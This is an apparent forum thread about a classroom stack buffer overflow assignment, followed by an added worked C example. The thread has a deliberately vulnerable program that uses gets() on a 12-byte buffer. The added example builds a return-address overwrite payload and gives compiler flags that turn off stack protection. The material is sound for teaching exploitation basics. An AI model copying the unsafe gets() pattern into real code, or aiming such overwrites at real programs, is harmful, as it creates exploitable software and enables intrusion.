
stack buffer overflow

Name: Anonymous 2012-07-26 13:33

I come to you for help with this assignment I have; smashing the stack. Implement a buffer overflow attack on the program isThisGood.c by exploiting the input (see gets()). If the exploit is successful, it should invoke the function oopsIGotToTheBadFunction!

a. What is the address of the function oopsIGotToTheBadFunction()?
How did you determine this?

b. What is the address on the stack that your input must overwrite
(address and content please)? How did you locate this address?

c. What is the address of buf?

d. What is the minimum length of your input, i.e. the length you need to alter
the return address stored on the stack?

e. What is your input? Show it in hex characters, since some of the
input is not likely to be printable.

#include <stdio.h>
#include <stdlib.h>

/* The exploit target: nothing in the program calls this. */
int oopsIGotToTheBadFunction(void)
{
    printf("Gotcha!\n");
    exit(0);
}

/* Deliberately vulnerable: gets() has no length limit, so input longer
   than 12 bytes runs past buf into the saved frame pointer and the
   saved return address of this function. */
int goodFunctionUserInput(void)
{
    char buf[12];
    gets(buf);
    return(1);
}

/* Reached on the normal return path only. */
int main(void)
{
    goodFunctionUserInput();
    printf("Overflow failed\n");
    return(1);
}

Name: Anonymous 2012-07-26 23:30

>>1,8,9

You have to load the buf buffer with the address of the oopsIGotToTheBadFunction function.

buf is a local variable inside the good function (I'm tired of writing those stupid names). Therefore, it exists inside a stack frame. Somewhere after the local variables on the stack frame, there is a return address for that function. Memory is laid out sequentially.

Now, if only you could find a way to scribble over the return address of the good function and replace it with a call to the bad function, instead of having it jump back in place inside main()...

Since you probably don't understand what those terms mean intuitively, you need to go do some learning on your own. I'm not going to write code for you, nor am I going to answer your questions for you.

Your first step begins with learning to use a debugger. OllyDbg on Windows is fine. I've only used gdb on Linux, but it'll work for small things (I wouldn't want to try reversing with gdb), including this assignment. For example, trying to view the stack pointer when there's no program running or paused at a breakpoint will cause it to show up as empty.

Your next step is to learn about the stack. Try Wikipedia (http://en.wikipedia.org/wiki/Call_stack#Structure).

Finally, gcc (and presumably other compilers, though I don't have anything else to verify this with) has some nice things built in to make stack smashing more difficult for you. You'll need to disable those when they become a problem. A quick Google search will suffice.

The classic paper on this topic is http://insecure.org/stf/smashstack.html

This has nice pictures: http://en.wikipedia.org/wiki/Stack_buffer_overflow

Deep understanding of this stuff requires knowledge of x86 ASM (assuming you're on that platform) and how it interacts with high(er)-level languages, namely, C. Any class that attempts to make you an expert in that in a semester with some shitty assignments like this one is stupid. Focus on getting the exploit to work (and yes, I was able to get it to work).

Merry Christmas
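The answer above describes the mechanics but, deliberately, not the payload. The following is an added example (not from either poster) of the payload-building step for parts d and e: filler up to the saved return address, then the target address in little-endian byte order, which assumes 32-bit x86. The offset of 16 bytes (12 of buf plus 4 of saved EBP) and the target address 0x080484b4 are placeholders for illustration; the real values must be read from gdb for the binary you actually compiled, since the compiler may pad the frame. The check for a 0x0a byte matters because gets() stops at a newline, so an address containing 0x0a cannot be delivered this way (NUL bytes are fine for gets(), unlike strcpy()).

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ASSUMPTION (illustrative): distance from the start of buf to the saved
 * return address: 12 bytes of buf plus 4 bytes of saved EBP on 32-bit x86
 * with no padding. Measure the real value in gdb while stopped inside
 * goodFunctionUserInput():   (gdb) p (char *)($ebp + 4) - (char *)buf   */
#define PAD_LEN 16u

/* ASSUMPTION (illustrative): a made-up address for oopsIGotToTheBadFunction.
 * Get the real one with   (gdb) p oopsIGotToTheBadFunction   or with nm. */
#define TARGET_ADDR 0x080484b4u

/* Write pad_len filler bytes followed by target in little-endian order.
 * Returns the payload length, or 0 if out cannot hold it. */
size_t build_payload(uint8_t *out, size_t out_len, size_t pad_len, uint32_t target)
{
    size_t total = pad_len + sizeof target;
    if (out_len < total)
        return 0;
    memset(out, 'A', pad_len);
    for (size_t i = 0; i < sizeof target; i++)
        out[pad_len + i] = (uint8_t)(target >> (8 * i));
    return total;
}

/* gets() reads up to the first '\n' (0x0a), so a payload containing that
 * byte would be cut short before the return address is fully overwritten.
 * Returns 1 if the bytes can be delivered through gets(), else 0. */
int payload_is_deliverable(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == '\n')
            return 0;
    return 1;
}

/* Hex rendering for the write-up (part e). out needs 2*n+1 bytes. */
char *hex_encode(const uint8_t *p, size_t n, char *out)
{
    static const char digits[] = "0123456789abcdef";
    for (size_t i = 0; i < n; i++) {
        out[2 * i]     = digits[p[i] >> 4];
        out[2 * i + 1] = digits[p[i] & 0x0f];
    }
    out[2 * n] = '\0';
    return out;
}

int main(void)
{
    uint8_t payload[PAD_LEN + sizeof(uint32_t)];
    char hex[2 * sizeof payload + 1];

    size_t n = build_payload(payload, sizeof payload, PAD_LEN, TARGET_ADDR);
    if (n == 0)
        return 1;
    if (!payload_is_deliverable(payload, n)) {
        fprintf(stderr, "target address contains 0x0a; gets() would truncate the payload\n");
        return 1;
    }
    printf("%zu bytes: %s\n", n, hex_encode(payload, n, hex));

    /* Feed the file to the target:  ./isThisGood < payload.bin  */
    FILE *f = fopen("payload.bin", "wb");
    if (!f)
        return 1;
    fwrite(payload, 1, n, f);
    fputc('\n', f);   /* ends the line for gets(); not part of the overwrite */
    fclose(f);
    return 0;
}
```

Build the target with the stack protector off, e.g. gcc -m32 -O0 -fno-stack-protector -o isThisGood isThisGood.c (add -no-pie on gcc versions that default to position-independent executables), then run ./isThisGood < payload.bin and expect "Gotcha!". Because the payload returns into existing code rather than into shellcode on the stack, the address of buf (part c) is not needed for it to work, and a non-PIE binary keeps the function address fixed even with ASLR enabled.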
